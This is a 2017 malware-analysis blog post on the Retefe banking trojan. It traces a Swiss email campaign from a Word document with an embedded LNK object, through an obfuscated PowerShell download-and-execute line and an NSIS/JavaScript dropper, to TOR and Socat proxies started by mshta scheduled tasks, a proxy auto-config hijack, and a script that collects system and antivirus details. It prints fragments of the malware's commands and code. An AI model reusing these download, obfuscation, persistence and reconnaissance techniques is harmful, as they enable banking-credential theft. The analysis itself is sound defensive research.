Saturday, 23 September 2017

Deep Dive into Retefe Banking Trojan - TOR and Socat Backdoor

Recently I observed an email campaign spreading Retefe through malicious Word Documents to users in Switzerland.

An instance of the email is shown in Figure 1.

Figure 1.

These Word Documents had an embedded LNK object present inside
them as shown in Figure 2.

Figure 2

Proofpoint recently mentioned in their blog about the usage of Eternal Blue Exploit in Retefe Banking Trojan however in the most recent samples, this section has been removed from the config.
Some of the details I mention here are not present in Proofpoint blog.

In this blog, I present details of different stages involved in this malware delivery mechanism.

If we extract the LNK object from the MS Office Word Document and check the value of the Target Field, it is set to:

cmd.exe /V /K set p=p&&!p!owershell -w hidden -c "IEX (('JD'+'0F'+'=JD0en'+'v:Temp+yh'+'CnMgcj'+'hhemyx.exeyh'+'C;(Ne'+'w-Object

This value is obfuscated using Powershell. Upon deobfusctation we can see that it will download a Binary from the URL: hxxp:// to the path:
%temp%\cjhhemyx.exe and execute it using IEX.

It is interesting to note that the Invoke Expression string, "IEX" is obfuscated here using: (GEt-VariAbLE '*mDR*').namE[3,11,2]-JOIn'') as shown in Figure 3.

Figure 3
This technique was used in Invoke-Obfuscation Powershell module here:

Now, let's download the malicious binary from the URL: hxxp:// and analyze it.

MD5 hash of the binary: 20ad3fa4986be9c01ffb6877cb96d5ed

It's an NSIS binary which executes a JavaScript upon execution. We can extract the contents of the NSIS file using 7z for the purpose of static analysis.

The JavaScript is obfuscated as shown in Figure 4.

Figure 4
After deobfuscating, we get the JavaScript as shown in Figure 5.

Figure 5
This JavaScript gives us an insight into all the malicious activities performed by the binary.

The most important section in this JavaScript is the config section. It's a collection of key value pairs and below is a brief description of them:

dl:[<list of TOR Servers>] - This contains a list of TOR servers which are used as a SOCKS proxy.
cert: It's a base64 encoded Certificate which will be installed on the machine.
psf: Base64 encoded Powershell Script which will install the Certificate.
pstp: Base64 encoded Powershell srcipt which will install TOR and Socat installer.
pslog: Base64 encoded Powershell script which will collect information about the machine and upload through FTP to attacker's server.

Note: Proofpoint recently mentioned in their blog that in some of the samples an additional section, pseb was observed in the config. This section had the Eternal Blue exploit
present inside. However, in the most recent samples this section in config is not present.

Below is the list of TOR domains used by the sample in this case as a Proxy:


Another important step performed by the JavaScript is to modify the Proxy Auto Config Settings as shown below:

        for(var i=0;
            var sIp=this.GetIp();

So, it sets the HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL key to the value:{0}.js?ip={1} where {0} corresponds to
random string of length 8 and {1} corresponds to the IP address of the machine.

Now, let's look at the tasks performed by each of the Powershell Scripts which are present inside the config.

pstp Powershell Script is as shown in Figure 6.

Figure 6
It performs the following main tasks:

1. It downloads TOR Browser from one of the TOR mirror sites into the directory: %appdata%\Ad0be.

2. It adds a scheduled task to start tor.exe process as shown below:

$tor_cmd="`"javascript:close(new ActiveXObject('WScript.Shell').Run('$tor',0,false))`"";
AddTask (RandomString) 'mshta.exe' $tor_cmd;

It is interesting to note that all the scheduled tasks are executed in the context of mshta.exe process. The actual command which needs to be executed is wrapped inside JavaScript which is executed by mshta.exe

3. It downloads Socat into the directory: %appdata%\Ad0be and creates the following scheduled tasks:

$s1cmd='socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050';
$s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050';
$s1_cmd="`"javascript:close(new ActiveXObject('WScript.Shell').Run('$s1cmd',0,false))`"";
$s2_cmd="`"javascript:close(new ActiveXObject('WScript.Shell').Run('$s2cmd',0,false))`"";
AddTask (RandomString) 'mshta.exe' $s1_cmd 0 0 $s_fold;
AddTask (RandomString) 'mshta.exe' $s2_cmd 0 0 $s_fold;

The purpose of the above scheduled tasks is to setup a TOR socks proxy on the machine. The value, %DOMAIN% above is substituted with one of the TOR domains mentioned above.

pslog Powershell script is as shown in Figure 7 and it is used to report the details of the infected machine to the Controller. The details are uploaded through FTP to a server
which requires Authentication.

Figure 7
Following details are gathered from the machine before uploading the logs:

1. OS Info - This includes Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages. Information is retrieved using WMI:

  $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages);

2. Powershell version.

3. The value of Proxy Auto Config settings. This information is retrieved from Windows Registry.

    $pac=Get-ItemProperty 'hkcu:\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\'|Select -expand AutoConfigURL -ErrorAction Stop;

4. Certificates installed on the machine with the Subject field of Certificate matching: "*COMODO RSA Extended Validation Secure Server CA 2*"

  $Certs = @(Get-ChildItem cert:\CurrentUser\ROOT|Where-Object {$_.Subject -like "*COMODO RSA Extended Validation Secure Server CA 2*"}|ForEach-Object {"{0} ({1})" -f

5. Details of the TOR and Socat processes running on the system:

    $proc = Get-Process | Where-Object {$_.ProcessName -like "tor*" -or $_.ProcessName -like "socat*"}|Select -Property @{ Name="Out";
Expression={"ID:{0}`nName:{1}`nPath:{2}`n-------------" -f $_.Id,$_.ProcessName,$_.Path}}|Select -expand Out;

6. Directory listing for the Directory: APPDATA+'\Ad0be

7. Details of the AV softwares installed:

  $avlist=(Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct"  @psboundparameters|Select -expand DisplayName);

The log file is uploaded through FTP and the name of the log file is set to the Computer Name.

As we can see in this blog, Banking Trojan Retefe is still active and continues to evolve.

No comments:

Post a Comment